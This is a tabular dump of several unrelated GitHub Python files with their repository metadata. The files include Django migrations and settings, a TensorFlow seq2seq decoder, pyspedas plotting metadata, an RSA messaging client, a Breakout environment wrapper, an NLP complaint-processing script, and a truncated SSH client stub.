blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f69a5854f33bc30eb43daf851f9e43ceb207ec1a | b7948d60834c4c6fe58d8d665177511cb6db53e2 | /Outpass Webapp + Api's - Django/student/migrations/0008_auto_20190815_0023.py | 08405388f8bb2400e3756da54e002813b1d1e8b2 | [] | no_license | abhinavsharma629/Outpass-Generator | 4a2ebc2c7d0fc678b2afd10a36c6cbcbc6583d60 | f363d49c47543c70e2c114ab7d48ffaef83b5de4 | refs/heads/master | 2022-02-24T15:07:58.171462 | 2019-10-05T16:05:09 | 2019-10-05T16:05:09 | 205,933,273 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,289 | py | # Generated by Django 2.2.4 on 2019-08-14 18:53
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('student', '0007_registeredcolleges_logo'),
]
operations = [
migrations.AlterField(
model_name='student',
name='bed_no',
field=models.PositiveIntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='student',
name='branch',
field=models.CharField(blank=True, max_length=50, null=True),
),
migrations.AlterField(
model_name='student',
name='er_no',
field=models.CharField(blank=True, max_length=7, null=True),
),
migrations.AlterField(
model_name='student',
name='hostel',
field=models.CharField(blank=True, max_length=50, null=True),
),
migrations.AlterField(
model_name='student',
name='room_no',
field=models.CharField(blank=True, max_length=50, null=True),
),
migrations.AlterField(
model_name='student',
name='year',
field=models.PositiveIntegerField(blank=True, null=True),
),
]
| [
"abhinavsharma629@gmail.com"
] | abhinavsharma629@gmail.com |
eee62d36b36c4aeebd4a3658b80342f4fe682763 | 384961849138a6f43679ec0c676ee2d71cefb307 | /MyTestAPI/MyTestAPI/wsgi.py | 367d0c41acaaf43b55f83e0ae626c5be007cccc2 | [] | no_license | emils-b/djangoAPI_learning | d64e8c1e2f2c5940bcdb890c4083a4b6e9110ce9 | 9383d73fc649486ebae24d056c2c8cc6464b509f | refs/heads/master | 2022-11-15T22:12:59.906716 | 2020-07-06T17:32:31 | 2020-07-06T17:32:31 | 272,533,983 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 395 | py | """
WSGI config for MyTestAPI project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'MyTestAPI.settings')
application = get_wsgi_application()
| [
"emils.baskers@gmail.com"
] | emils.baskers@gmail.com |
0e354876c5279164c2576a15409170e757c6785a | c3eb84c722f6ec5d21cae2a8dd840dabd2b5b892 | /Programming in Python-311.py | 646209e09301c7b6b458f3d5a962403b784e73b2 | [] | no_license | AlpeshGo/DataQuest-Data-Analyst-in-Python | ca2266dd062556af5a9bcd9333dff96e99cae1c5 | f96250cb99da4c868f4989cf78ccf001bed1bf07 | refs/heads/main | 2023-06-28T04:51:53.896356 | 2021-07-28T17:12:20 | 2021-07-28T17:12:20 | 386,670,880 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 376 | py | ## 2. Programming in Python ##
23+7
## 3. The print() Command ##
print(40+4)
print(200-25)
print(14+3)
## 4. Python Syntax ##
print(30+10+40)
print(4)
print(-3)
## 5. Computer Programs ##
print(34+16)
print(34)
print(-34)
## 6. Code Comments ##
# INITIAL CODE
print(34 + 16)
print(34)
print(-34)
## 7. Arithmetical Operations ##
print(16*10)
print(48/5)
print(5**3) | [
"noreply@github.com"
] | noreply@github.com |
34705821e8da255de9377392fc63624202cd296b | 0d8d97082f7c562f3f24a7a5966066f10299e356 | /beerControl.py | 67656a1fd0f403cdb70f21f705b1feacca991d0a | [] | no_license | dmoranj/fi-beer | 7b4bf066f4c64ecf6bf371c2ad98e6bd6688d9cb | 41ff6c6a51c243219305624af33517bd62951bc1 | refs/heads/master | 2016-09-06T01:57:23.426214 | 2014-01-28T12:37:18 | 2014-01-28T12:37:18 | 16,064,837 | 7 | 0 | null | null | null | null | UTF-8 | Python | false | false | 771 | py | #!/usr/bin/env python
# LED with 560 Ohm resistor on Pin 10 to GND
# Tony Goodhew - 10 May 2013
from nanpy import Arduino
from nanpy import serial_manager
serial_manager.connect('/dev/ttyACM0') # serial connection to Arduino
from time import sleep
import NGSIClient
pins = [0, 1]
for pin in pins:
Arduino.pinMode(pin, Arduino.INPUT)
while 4 < 5:
temperaturesList = []
for pin in pins:
print "Reading"
value = Arduino.analogRead(pin)
degreesC = (value * 0.004882814)*100
print "The voltage in pin " + str(pin) + " is " + str(degreesC)
temperaturesList.append(degreesC)
NGSIClient.createContext("Cuba", "CubaDani", NGSIClient.createMeasureArray("centrigrade", "temperature", temperaturesList))
sleep(5)
print "Finished reading"
| [
"daniel@Aosta.(none)"
] | daniel@Aosta.(none) |
5a5e091b0cb0991756eaa7e0c7fdb809951c7cd4 | d158e396e083ad6761a1871bd39519d588c461bc | /hw/9dcv/contrib_seq2seq.py | e2a412f09abce6ff8f5b388720e649b2947d8530 | [] | no_license | jendelel/npfl114 | c7250e6256f556c2e9f134dce2f2148117c43368 | 44a562e2aae96a9e30f930cfae7985043f172828 | refs/heads/master | 2021-01-10T18:07:46.310969 | 2017-01-16T15:10:04 | 2017-01-16T15:10:04 | 71,621,825 | 1 | 2 | null | 2017-01-05T09:59:18 | 2016-10-22T06:42:31 | Python | UTF-8 | Python | false | false | 9,159 | py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Seq2seq layer operations for use in neural networks.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib import layers
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import rnn
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variable_scope as vs
# decoder_fn(time, cell_state, cell_input, cell_output, context_state)
# -> (done, next_state, next_input, emit_output, next_context_state
def dynamic_rnn_decoder(cell, decoder_fn, inputs=None, sequence_length=None,
parallel_iterations=None, swap_memory=False,
time_major=False, scope=None, name=None):
""" Dynamic RNN decoder for a sequence-to-sequence model specified by
RNNCell and decoder function.
The `dynamic_rnn_decoder` is similar to the `tf.python.ops.rnn.dynamic_rnn`
as the decoder does not make any assumptions of sequence length and batch
size of the input.
The `dynamic_rnn_decoder` has two modes: training or inference and expects
the user to create seperate functions for each.
Under both training and inference `cell` and `decoder_fn` is expected. Where
the `cell` performs computation at every timestep using the `raw_rnn` and
the `decoder_fn` allows modelling of early stopping, output, state, and next
input and context.
When training the user is expected to supply `inputs`. At every time step a
slice of the supplied input is fed to the `decoder_fn`, which modifies and
returns the input for the next time step.
`sequence_length` is needed at training time, i.e., when `inputs` is not
None, for dynamic unrolling. At test time, when `inputs` is None,
`sequence_length` is not needed.
Under inference `inputs` is expected to be `None` and the input is inferred
solely from the `decoder_fn`.
Args:
cell: An instance of RNNCell.
decoder_fn: A function that takes time, cell state, cell input,
cell output and context state. It returns a early stopping vector,
cell state, next input, cell output and context state.
Examples of decoder_fn can be found in the decoder_fn.py folder.
inputs: The inputs for decoding (embedded format).
If `time_major == False` (default), this must be a `Tensor` of shape:
`[batch_size, max_time, ...]`.
If `time_major == True`, this must be a `Tensor` of shape:
`[max_time, batch_size, ...]`.
The input to `cell` at each time step will be a `Tensor` with dimensions
`[batch_size, ...]`.
sequence_length: (optional) An int32/int64 vector sized `[batch_size]`.
if `inputs` is not None and `sequence_length` is None it is inferred
from the `inputs` as the maximal possible sequence length.
parallel_iterations: (Default: 32). The number of iterations to run in
parallel. Those operations which do not have any temporal dependency
and can be run in parallel, will be. This parameter trades off
time for space. Values >> 1 use more memory but take less time,
while smaller values use less memory but computations take longer.
swap_memory: Transparently swap the tensors produced in forward inference
but needed for back prop from GPU to CPU. This allows training RNNs
which would typically not fit on a single GPU, with very minimal (or no)
performance penalty.
time_major: The shape format of the `inputs` and `outputs` Tensors.
If true, these `Tensors` must be shaped `[max_time, batch_size, depth]`.
If false, these `Tensors` must be shaped `[batch_size, max_time, depth]`.
Using `time_major = True` is a bit more efficient because it avoids
transposes at the beginning and end of the RNN calculation. However,
most TensorFlow data is batch-major, so by default this function
accepts input and emits output in batch-major form.
scope: VariableScope for the `raw_rnn`;
defaults to None.
name: NameScope for the decoder;
defaults to "dynamic_rnn_decoder"
Returns:
A pair (outputs, state) where:
outputs: the RNN output 'Tensor'.
If time_major == False (default), this will be a `Tensor` shaped:
`[batch_size, max_time, cell.output_size]`.
If time_major == True, this will be a `Tensor` shaped:
`[max_time, batch_size, cell.output_size]`.
state: The final state and will be shaped
`[batch_size, cell.state_size]`.
Raises:
ValueError: if inputs is not None and has less than three dimensions.
"""
with ops.name_scope(name, "dynamic_rnn_decoder",
[cell, decoder_fn, inputs, sequence_length,
parallel_iterations, swap_memory, time_major, scope]):
if inputs is not None:
# Convert to tensor
inputs = ops.convert_to_tensor(inputs)
# Test input dimensions
if inputs.get_shape().ndims is not None and (
inputs.get_shape().ndims < 2):
raise ValueError("Inputs must have at least two dimensions")
# Setup of RNN (dimensions, sizes, length, initial state, dtype)
if not time_major:
# [batch, seq, features] -> [seq, batch, features]
inputs = array_ops.transpose(inputs, perm=[1, 0, 2])
dtype = inputs.dtype
# Get data input information
input_depth = int(inputs.get_shape()[2])
batch_depth = inputs.get_shape()[1].value
max_time = inputs.get_shape()[0].value
if max_time is None:
max_time = array_ops.shape(inputs)[0]
# Setup decoder inputs as TensorArray
inputs_ta = tensor_array_ops.TensorArray(dtype, size=max_time)
inputs_ta = inputs_ta.unpack(inputs)
def loop_fn(time, cell_output, cell_state, loop_state):
if cell_state is None: # first call, before while loop (in raw_rnn)
if cell_output is not None:
raise ValueError("Expected cell_output to be None when cell_state "
"is None, but saw: %s" % cell_output)
if loop_state is not None:
raise ValueError("Expected loop_state to be None when cell_state "
"is None, but saw: %s" % loop_state)
context_state = None
else: # subsequent calls, inside while loop, after cell excution
if isinstance(loop_state, tuple):
(done, context_state) = loop_state
else:
done = loop_state
context_state = None
# call decoder function
if inputs is not None: # training
# get next_cell_input
if cell_state is None:
next_cell_input = inputs_ta.read(0)
else:
if batch_depth is not None:
batch_size = batch_depth
else:
batch_size = array_ops.shape(done)[0]
next_cell_input = control_flow_ops.cond(
math_ops.equal(time, max_time),
lambda: array_ops.zeros([batch_size, input_depth], dtype=dtype),
lambda: inputs_ta.read(time))
(next_done, next_cell_state, next_cell_input, emit_output,
next_context_state) = decoder_fn(time, cell_state, next_cell_input,
cell_output, context_state)
else: # inference
# next_cell_input is obtained through decoder_fn
(next_done, next_cell_state, next_cell_input, emit_output,
next_context_state) = decoder_fn(time, cell_state, None, cell_output,
context_state)
# check if we are done
if next_done is None: # training
next_done = time >= sequence_length
# build next_loop_state
if next_context_state is None:
next_loop_state = next_done
else:
next_loop_state = (next_done, next_context_state)
return (next_done, next_cell_input, next_cell_state,
emit_output, next_loop_state)
# Run raw_rnn function
outputs_ta, state, _ = rnn.raw_rnn(
cell, loop_fn, parallel_iterations=parallel_iterations,
swap_memory=swap_memory, scope=scope)
outputs = outputs_ta.pack()
if not time_major:
# [seq, batch, features] -> [batch, seq, features]
outputs = array_ops.transpose(outputs, perm=[1, 0, 2])
return outputs, state
| [
"lukas.jendele@gmail.com"
] | lukas.jendele@gmail.com |
b899b807968e506eff8c87b6680f93bbba599982 | 407ba0e97fd7e358b9ac546895778d25ca653198 | /mytestsite/mytestsite/settings.py | a53fbc85a55534178d673c72425056277f9dd38e | [] | no_license | LakshayBadlani/DjangoLibrarySite | 04b9cb1f00c1b711215ab8e81c4d6f129b95f11f | adc366c98bc088646d6121de3d6b54c980da2507 | refs/heads/master | 2020-03-19T04:37:38.335466 | 2018-06-02T20:01:13 | 2018-06-02T20:01:13 | 135,847,654 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,100 | py | """
Django settings for mytestsite project.
Generated by 'django-admin startproject' using Django 2.0.4.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '=v5&e#wmc-_lb#@5ub25ih5fbbv(3+$2s=yb2ze)!^-d54juv$'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mytestsite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mytestsite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
| [
"l.badlani@berkeley.edu"
] | l.badlani@berkeley.edu |
37842015585005a9c5c98209b970920d38a474d0 | 991c0299c9eae4034db672a2c405bafc8f44e1c8 | /pyspedas/pyspedas/mms/edi/mms_edi_set_metadata.py | c5ea1670c006a30d978aab0ce337ad344dffe31c | [
"MIT"
] | permissive | nsioulas/MHDTurbPy | 650b915cb23f4dd2458d09450e7dc1382c643da2 | 7ac6615caa737fb89b0314d1d55fcd60537c423c | refs/heads/main | 2023-06-01T06:31:58.944174 | 2023-05-13T05:36:06 | 2023-05-13T05:36:06 | 590,799,212 | 8 | 1 | null | 2023-02-01T20:38:49 | 2023-01-19T08:33:08 | Jupyter Notebook | UTF-8 | Python | false | false | 3,513 | py | from pytplot import options
from pyspedas import tnames
def mms_edi_set_metadata(probe, data_rate, level, suffix=''):
"""
This function updates the metadata for EDI data products
Parameters
----------
probe : str or list of str
probe or list of probes, valid values for MMS probes are ['1','2','3','4'].
data_rate : str or list of str
instrument data rate for EDI
level : str
indicates level of data processing. the default if no level is specified is 'l2'
suffix: str
The tplot variable names will be given this suffix. By default,
no suffix is added.
"""
if not isinstance(probe, list): probe = [probe]
if not isinstance(data_rate, list): data_rate = [data_rate]
if not isinstance(level, list): level = [level]
instrument = 'edi'
tvars = set(tnames())
for this_probe in probe:
for this_dr in data_rate:
for this_lvl in level:
if 'mms'+str(this_probe)+'_'+instrument+'_vdrift_dsl_'+this_dr+'_'+this_lvl+suffix in tvars:
options('mms'+str(this_probe)+'_'+instrument+'_vdrift_dsl_'+this_dr+'_'+this_lvl+suffix, 'ytitle', 'MMS'+str(this_probe)+' EDI drift velocity')
options('mms'+str(this_probe)+'_'+instrument+'_vdrift_dsl_'+this_dr+'_'+this_lvl+suffix, 'legend_names', ['Vx DSL', 'Vy DSL', 'Vz DSL'])
if 'mms'+str(this_probe)+'_'+instrument+'_vdrift_gse_'+this_dr+'_'+this_lvl+suffix in tvars:
options('mms'+str(this_probe)+'_'+instrument+'_vdrift_gse_'+this_dr+'_'+this_lvl+suffix, 'ytitle', 'MMS'+str(this_probe)+' EDI drift velocity')
options('mms'+str(this_probe)+'_'+instrument+'_vdrift_gse_'+this_dr+'_'+this_lvl+suffix, 'legend_names', ['Vx GSE', 'Vy GSE', 'Vz GSE'])
if 'mms'+str(this_probe)+'_'+instrument+'_vdrift_gsm_'+this_dr+'_'+this_lvl+suffix in tvars:
options('mms'+str(this_probe)+'_'+instrument+'_vdrift_gsm_'+this_dr+'_'+this_lvl+suffix, 'ytitle', 'MMS'+str(this_probe)+' EDI drift velocity')
options('mms'+str(this_probe)+'_'+instrument+'_vdrift_gsm_'+this_dr+'_'+this_lvl+suffix, 'legend_names', ['Vx GSM', 'Vy GSM', 'Vz GSM'])
if 'mms'+str(this_probe)+'_'+instrument+'_e_dsl_'+this_dr+'_'+this_lvl+suffix in tvars:
options('mms'+str(this_probe)+'_'+instrument+'_e_dsl_'+this_dr+'_'+this_lvl+suffix, 'ytitle', 'MMS'+str(this_probe)+' EDI e-field')
options('mms'+str(this_probe)+'_'+instrument+'_e_dsl_'+this_dr+'_'+this_lvl+suffix, 'legend_names', ['Ex DSL', 'Ey DSL', 'Ez DSL'])
if 'mms'+str(this_probe)+'_'+instrument+'_e_gse_'+this_dr+'_'+this_lvl+suffix in tvars:
options('mms'+str(this_probe)+'_'+instrument+'_e_gse_'+this_dr+'_'+this_lvl+suffix, 'ytitle', 'MMS'+str(this_probe)+' EDI e-field')
options('mms'+str(this_probe)+'_'+instrument+'_e_gse_'+this_dr+'_'+this_lvl+suffix, 'legend_names', ['Ex GSE', 'Ey GSE', 'Ez GSE'])
if 'mms'+str(this_probe)+'_'+instrument+'_e_gsm_'+this_dr+'_'+this_lvl+suffix in tvars:
options('mms'+str(this_probe)+'_'+instrument+'_e_gsm_'+this_dr+'_'+this_lvl+suffix, 'ytitle', 'MMS'+str(this_probe)+' EDI e-field')
options('mms'+str(this_probe)+'_'+instrument+'_e_gsm_'+this_dr+'_'+this_lvl+suffix, 'legend_names', ['Ex GSM', 'Ey GSM', 'Ez GSM']) | [
"nsioulas@g.ucla.edu"
] | nsioulas@g.ucla.edu |
c6003fe58dc0e8d77951f5bc6a3d9a76d0811c41 | 84fbc1625824ba75a02d1777116fe300456842e5 | /Engagement_Challenges/Engagement_4/powerbroker_2/proofs/powerbroker/overlogging/comms_client.py | b86bb9c2bfa9e9b6aa4a339c5a3b0e8fa2e6d0f6 | [] | no_license | unshorn-forks/STAC | bd41dee06c3ab124177476dcb14a7652c3ddd7b3 | 6919d7cc84dbe050cef29ccced15676f24bb96de | refs/heads/master | 2023-03-18T06:37:11.922606 | 2018-04-18T17:01:03 | 2018-04-18T17:01:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,050 | py | from Crypto.PublicKey import RSA
from Crypto.Util.number import inverse
import rsa_gen
import comms_connection
E = 65537L
class CommsClient(object):
def __init__(self, name, rsa_prime1_file=None, rsa_prime2_file=None):
self.name = name
if rsa_prime1_file is None:
self.rsa = create_new_rsa()
else:
self.rsa = generate_rsa(rsa_prime1_file, rsa_prime2_file)
def connect(self, host, port, handler, our_host=None, our_port=None):
if our_host is None or our_port is None:
self.connection = comms_connection.Connection(host, port, handler, self.name, self.rsa)
else:
self.connection = comms_connection.Connection(host, port, handler, self.name, self.rsa, our_host, our_port)
return self.connection
def create_new_rsa():
prime1, prime2 = rsa_gen.generate_primes()
return generate_rsa_from_primes(prime1, prime2)
def generate_rsa(prime1_file, prime2_file):
"""
:param prime1: file containing the first rsa prime
:param prime2: file containing the second rsa prime
:return: the rsa instance and the public modulus
"""
prime1, prime2 = read_primes(prime1_file, prime2_file)
return generate_rsa_from_primes(prime1, prime2)
def generate_rsa_from_primes(prime1, prime2):
public_mod = prime1*prime2
d = inverse(E, (prime1 - 1)*(prime2 - 1))
rsa_tuple = (public_mod, E, d, prime1, prime2)
rsa_impl = RSA.RSAImplementation(use_fast_math=False)
return rsa_impl.construct(rsa_tuple)
def read_primes(p_file, q_file=None):
"""
Reads primes p and q in from file(s) and converts them to python integers.
"""
if q_file is None:
# both primes are in the same file on different lines
with open(p_file) as f:
pstr = f.readline()
qstr = f.readline()
return (int(pstr), int(qstr))
with open(p_file) as f:
pstr = f.read()
p = int(pstr)
with open(q_file) as f:
qstr = f.read()
q = int(qstr)
return (p,q)
| [
"rborbely@cyberpointllc.com"
] | rborbely@cyberpointllc.com |
b32873f6bdc08e24cf8e955a80460c699fad54e4 | e8f44980b2db5c77a23e3b50eece1154ea1fb33d | /paddle.py | f98e4db3effb3f682343bd42f64bed701d3b8d93 | [] | no_license | CalCharles/SelfBreakout | adb9a96a2356a618e9f530f080a666644c5634c6 | 742006ef1dc9239f467aac1b9599afe26683f87b | refs/heads/master | 2020-07-23T18:58:08.070637 | 2019-09-10T22:45:07 | 2019-09-10T22:45:07 | 207,675,605 | 0 | 1 | null | 2019-09-10T22:53:55 | 2019-09-10T22:39:36 | Python | UTF-8 | Python | false | false | 2,165 | py | import os
from SelfBreakout.breakout_screen import Screen
from Environments.environment_specification import RawEnvironment
from file_management import get_edge
class Paddle(RawEnvironment):
'''
A fake environment that pretends that the paddle partion has been solved, gives three actions that produce
desired behavior
'''
def __init__(self, frameskip = 1):
self.num_actions = 3
self.itr = 0
self.save_path = ""
self.screen = Screen(frameskip=frameskip)
self.reward= 0
self.episode_rewards = self.screen.episode_rewards
def set_save(self, itr, save_dir, recycle, all_dir=""):
self.save_path=save_dir
self.itr = itr
self.recycle = recycle
self.screen.save_path=save_dir
self.screen.itr = itr
self.screen.recycle = recycle
self.all_dir = all_dir
try:
os.makedirs(save_dir)
except OSError:
pass
def step(self, action):
# TODO: action is tenor, might not be safe assumption
action = action.clone()
if action == 1:
action[0] = 2
elif action == 2:
action[0] = 3
raw_state, factor_state, done = self.screen.step(action, render=True)
self.reward = self.screen.reward
if factor_state["Action"][1][0] < 2:
factor_state["Action"] = (factor_state["Action"][0], 0)
elif factor_state["Action"][1][0] == 2:
factor_state["Action"] = (factor_state["Action"][0], 1)
elif factor_state["Action"][1][0] == 3:
factor_state["Action"] = (factor_state["Action"][0], 2)
return raw_state, factor_state, done
def getState(self):
raw_state, factor_state = self.screen.getState()
if factor_state["Action"][1][0] < 2:
factor_state["Action"] = (factor_state["Action"][0], 0)
elif factor_state["Action"][1][0] == 2:
factor_state["Action"] = (factor_state["Action"][0], 1)
elif factor_state["Action"][1][0] == 3:
factor_state["Action"] = (factor_state["Action"][0], 2)
return raw_state, factor_state
| [
"calebchuck@berkeley.edu"
] | calebchuck@berkeley.edu |
e8cd16d642eafb7841ee2000f309a5ac455c14ed | 6724031f51d41992deb8fc704b35b6faf3d94715 | /prj/machine_learning.py | 5a7c4e0aaafdbf287cbc2234f9fdbb00c0a3a17d | [
"MIT"
] | permissive | alenahoopoe/MakeComplaint | e8c2bdbec71cd0a86f2efcccd90a79de4063e7e7 | d09dcd9a67414ffae199765b4e6d4b4397769916 | refs/heads/master | 2022-01-05T02:17:54.851117 | 2019-06-25T17:55:40 | 2019-06-25T17:55:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,765 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed May 1 17:42:58 2019
@author: gayathri
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
dataset = pd.read_csv('/home/gayathri/project/MakeComplaint/data.csv')
data = pd.read_csv('/home/gayathri/project/MakeComplaint/data.csv')
x = dataset.iloc[:,1:-1]
y = dataset.iloc[:,3].values
data['Complaint'] = data['Complaint'].str.replace(',',' ')
data['Subject'] = data['Subject'] =data['Subject'].str.replace('[^\w\s]','')
data['Complaint'] = data['Complaint'] =data['Complaint'].str.replace('[^\w\s]','')
#data['Complaint'] = data['Complaint'].str.replace(',',' ').str.lower()
data['Subject'] = data['Subject'] .str.replace('\d+', ' ')
data['Complaint'] = data['Complaint'] .str.replace('\d+', ' ')
data['Subject'] = data['Subject'].str.rstrip('\n')
data['Complaint'] = data['Complaint'].str.rstrip('\n')
data['Subject_and_Complaint'] = data['Subject'] + " " + data['Complaint']
#x = datase.iloc[:,4].values
#splitting the data
from sklearn.model_selection import train_test_split
x_train,x_test,y_train,y_test = train_test_split(x,y,test_size =0.2,random_state = 0)
#Categorical data processing
from sklearn.preprocessing import LabelEncoder,OneHotEncoder
label_encoder_y = LabelEncoder()
y = label_encoder_y.fit_transform(y)
dataframe = data[['Subject','Complaint']]
df=dataframe
df['Subject_and_Complaint'] = dataframe['Subject']+" "+ dataframe['Complaint']
df=df[['Subject_and_Complaint']]
print(df)
from nltk.corpus import stopwords
import nltk
from nltk.tokenize import word_tokenize
data_token = []
stop_words = set(stopwords.words('english'))
data_list = []
#Removing named entities in the list
import spacy
nlp = spacy.load('en_core_web_md')
lis =[]
main_list =[]
for i, row in df.iterrows():
lis =[]
df_row = nlp(row['Subject_and_Complaint'])
for ent in df_row.ents:
#print(ent.text, ent.label_)
lis .append(ent.text)
main_list.append(lis)
print("Named entity")
print(main_list)
#Tokens
for i, row in df.iterrows():
data_token = word_tokenize(row['Subject_and_Complaint'])
result = [i for i in data_token if not i in stop_words]
data_list.append(result)
print("Tokens without stopwords")
print(data_list)
#Removing named entity
'''
for m,d in main_list,data_list:
for j, k in m,d:
if j not
'''
#vector representation of complaint
import spacy
nlp = spacy.load('en_core_web_md')
new_lis = []
lis = []
for i in data_list:
new_lis = []
for j in i:
j = nlp(j)
vec = j.vector_norm
vec=float("{0:.2f}".format(vec))
new_lis.append(vec)
lis.append(new_lis)
print("\n Vectors \n")
print(lis)
#import gensim, logging
#model = gensim.models.Word2Vec(data_list), min_count=1)
'''#Encoding the complaint data
import skipthoughts
class SkipThoughtsVectorizer(object):
def __init__(self):
self.model = skipthoughts.load_model()
self.encoder = skipthoughts.Encoder(self.model)
def fit_transform(self, raw_documents, y):
return self.encoder.encode(raw_documents, verbose=False)
def fit(self, raw_documents, y=None):
self.fit_transform(raw_documents, y)
return self
def transform(self, raw_documents, copy=True):
return self.fit_transform(raw_documents, None)
from sklearn.pipeline import Pipeline, FeatureUnion
from sklearn.linear_model import LogisticRegression
from sklearn.feature_extraction.text import TfidfVectorizer
pipeline_skipthought = Pipeline(steps=[('vectorizer', SkipThoughtsVectorizer()),
('classifier', LogisticRegression())])
pipeline_tfidf = Pipeline(steps=[('vectorizer', TfidfVectorizer(ngram_range=(1, 2))),
('classifier', LogisticRegression())])
feature_union = ('feature_union', FeatureUnion([
('skipthought', SkipThoughtsVectorizer()),
('tfidf', TfidfVectorizer(ngram_range=(1, 2))),
]))
pipeline_both = Pipeline(steps=[feature_union,
('classifier', LogisticRegression())])
# Train and test the models
for train_size in (10,20,30,40,50,60, len(x_train)):
print(train_size, '--------------------------------------')
# skipthought
pipeline_skipthought.fit(x_train[:train_size], classes_train[:train_size])
print ('skipthought', pipeline_skipthought.score(x_test, y_test))
# tfidf
pipeline_tfidf.fit(x_train[:train_size], classes_train[:train_size])
print('tfidf', pipeline_tfidf.score(x_test, y_test))
# both
pipeline_both.fit(tweets_train[:train_size], classes_train[:train_size])
print('skipthought+tfidf', pipeline_both.score(x_test, y_test))'''
| [
"gaya3vs.0007@gmail.com"
] | gaya3vs.0007@gmail.com |
e653fd731ccd9db6f8d81fadcce9fd4d304d5bff | 8ba2e630323ebcef7be85a4eff4a5487bcb42252 | /repinteractive/InterActiveBase.py | 8328bb4043b449580c9ed799c3bd6eebc79337a8 | [] | no_license | 768001076/python-zouba-usecode | 4245b8ccdbf88e5b3879e6006f4cf0a378498a8a | c75ef921d358082d26ae63b5c3775bcd28f8d0f7 | refs/heads/master | 2020-03-27T02:21:35.169826 | 2018-08-23T01:37:14 | 2018-08-23T01:37:16 | 145,783,879 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,008 | py | import os
from paramiko.client import AutoAddPolicy
from paramiko.client import SSHClient
# from otherTools import OtherTools
class MySSHClient:
